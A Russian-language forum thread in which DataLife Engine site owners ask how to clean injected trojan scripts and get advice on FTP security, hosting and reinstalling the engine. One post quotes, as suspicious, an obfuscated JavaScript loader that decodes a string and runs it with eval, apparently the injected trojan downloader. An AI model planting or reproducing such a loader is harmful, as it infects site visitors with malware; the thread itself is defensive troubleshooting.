Перейти к публикации

Рекомендованные сообщения

Сайт на движке DataLife Engine . Проблема в том что хакеры часто ломятся на сайт и прошивают левые скрипты , после этого сайт начинает тупить , приходиться искать и удалять вручную . Посоветуйте , что мне делать ????

С уважением ,

Ссылка на сайт : http://www.vip-zona.com/

Изменено пользователем STRANNICK2008
Ссылка на сообщение
Поделиться на других сайтах

Проблема в том что хакеры часто ломятся на сайт и прошивают левые скрипты
скорее не на сайт, а на ваш компьютер или хостера.

1. Защитить свой компьютер

2. Выбирать надёжного хостера

Ссылка на сообщение
Поделиться на других сайтах

За последние 2 года ни разу не слышал чтобы это было из-за хостера (*NIX хостера).

А по поводу проблемы, погуглите насчет .ftpaccess

Изменено пользователем Danila
Ссылка на сообщение
Поделиться на других сайтах
За последние 2 года ни разу не слышал чтобы это было из-за хостера (*NIX хостера).
pr службы не зря зарплату получает
Ссылка на сообщение
Поделиться на других сайтах

//offtop

хм, сейчас обнаружил что Age-Web.Org ломанули, хз как, хостер, ftp... туда ходить НЕ советую без антивиря и из под IE, около 5 фраймов насчитал по пискам антириря

Ссылка на сообщение
Поделиться на других сайтах

За последние 2 года ни разу не слышал чтобы это было из-за хостера

ага, - у меня год назад один сотрудник хостера, где у меня был сайт: сначала потихому менял код рекламных блоков Гугла, а потом вообще выкачал весь сайт и сделал зеркало...

я его вычислил и поймал за жопу! Хостер конечно извинился, говоря что в их практике такое впервые, но мне пришлось от них уйти.

... а прикиньте какое "гавно" им было еслиб я начал постить отзывы везде где мона?

Радует одно - этот "сотрудник" потерялся так, что его никто не может найти. :D

Ссылка на сообщение
Поделиться на других сайтах

Народ помогите избавиться от вируса в админ панели сайта,что делать не знаю,очень прошу помощи,вот что пишет касперский при входе в админ панель сайта

обнаружено: троянская программа Trojan-Downloader.JS.Agent.iz Скрипт: admin.php[1]

обнаружено: троянская программа Trojan-Downloader.JS.Psyme.mf Скрипт: admin.php[2]

Зарание благодарен с уважением Виктор.

Ссылка на сообщение
Поделиться на других сайтах

pilisos,

правило форума читайте и выполняйте если вам нужна помощь на этом форуме.

Ссылка на сообщение
Поделиться на других сайтах

нужно просто фтп пароль сделать нормальным а не домашний телефон и вирусы ломится небудут... А ещё во времена когда я сидел на нулях (по незнанке :) ) тоже каждый день индекс пхп чистил от фреймов с троянами

Ссылка на сообщение
Поделиться на других сайтах

нужно просто фтп пароль сделать нормальным а не домашний телефон и вирусы ломится небудут... А ещё во времена когда я сидел на нулях (по незнанке :) ) тоже каждый день индекс пхп чистил от фреймов с троянами

Не поможет, по протоколу FTP пароль передается в незашифрованном виде. Если у вас сидит троян хоть такой Hyd683mxd00 пароль ставте, его просто утянут и всё. Это поможет если пользуетесь SFTP клиентом или SSH + антивирус мониторит на трояны.

Проще .ftpaccess настроить.

Изменено пользователем Danila
Ссылка на сообщение
Поделиться на других сайтах

Народ помогите избавиться от вируса в админ панели сайта,что делать не знаю,очень прошу помощи,вот что пишет касперский при входе в админ панель сайта

обнаружено: троянская программа Trojan-Downloader.JS.Agent.iz Скрипт: admin.php[1]

обнаружено: троянская программа Trojan-Downloader.JS.Psyme.mf Скрипт: admin.php[2]

Зарание благодарен с уважением Виктор.

Адрес сайта:www.pilisos.net

Ссылка на сообщение
Поделиться на других сайтах

оффтоп:

pilisos,

за распространение нуленых версий ДЛЕ по головке не гладят... Никогда не понимал таких людей. На сайте лежит нулленый скрипт, а хозяин лезет в официальную техподержку!

Изменено пользователем empirator
Ссылка на сообщение
Поделиться на других сайтах

Извени конечно,но их нуленных лежит на сотнях сайтов,на модин меньше на один больше нечего не изменит,запусти гугл и увидеш сколько нуленных лежит на сайтах.

А если можеш лучше помоги избавиться от вируса на сайте.

Если что не так извени.

Ссылка на сообщение
Поделиться на других сайтах

pilisos,

обрати внимание на лицензионное соглашение:

Покупатель не имеет право:

Передавать права на использование программного продукта третьим лицам.

Изменять структуру программных кодов, функции программы, с целью создания родственных продуктов

Создавать отдельные самостоятельные продукты, базирующиеся на нашем программном коде

Использовать более одной копии програмного продукта DataLife Engine по одной лицензии

Рекламировать, продавать или публиковать на своем сайте пиратские копии нашего программного продукта

Распространять или содействовать распространению нелицензионных копий програмного продукта DataLife Engine

Досрочное расторжение договорных обязательств

Данное соглашение расторгается автоматически, если Вы отказываетесь выполнять условия нашего договора. Данное лицензионное соглашение может быть расторгнуто нами в одностороннем порядке, в случае установления фактов нарушения данного лицензионного соглашения. В случае досрочного расторжения договора Вы обязуетесь удалить все Ваши копии нашего программного продукта в течение 3 рабочих дней, с момента получения соответствующего уведомления.

Ссылка на сообщение
Поделиться на других сайтах

Еще раз извеняюсь и обязуюсь сегодня удалить с сайта нуленную версию движка.А насчот вируса хто нибудь хоть слово напишет?

Ссылка на сообщение
Поделиться на других сайтах

Лично мне подозрителен этот код:

<script language=JavaScript>function aklban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,7,27,12,42,9,26,50,11,23,0,0,0,0,0,0,58,47,39,45,36,43,21,24,60,37,62,51,

31,55,56,5,4,59,29,0,15,57,52,53,30,6,19,0,0,0,0,8,0,16,22,1,46,2,44,35,34,48,33,

40,49,10,61,17,25,18,28,3,41,38,13,20,14,32,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(202^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}aklban('nxmtdb6ADBEAE@QAUXLQxbmtAzXHdb640X@ED@8UnhQkJJ4NC20kfhQ4BJ4@Dd@tAXT0U0@0@EXd

Nu@nk84AJ48HI9XJ@x6EUqJkD76tIQ2UWMXN1d4AhqxdIJ8tdmJjE@EkDgQ4D@6tBmJNyMTJK80NjMx0U

0@0@MXNCgd@nx4EJm@nQMAH48@Egz4kJXA0QEXdJxEtAXT@dx6d@6@4KeTtIq@EkZAnITmENd@tAqLQgs')</script>

Зачем он там?

Ссылка на сообщение
Поделиться на других сайтах

Большое спасибо,вечером попробую.я сейчас на работе.Кстати вирус, касперский находит какраз при входе в админ панель и еще меня постоянно выбрасывает из админ панели в поисковик яндекс, тоже из за вируса наверно?

Ссылка на сообщение
Поделиться на других сайтах

сделай контекстный поиск по всем файлам движка (включая шаблоны), ищи либо iframe либо script, подозрительные файлы сравнивай с дистрибутивом, и удаляй все лишнее. А еще проще дистрибутив перезалить поверх существующего.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...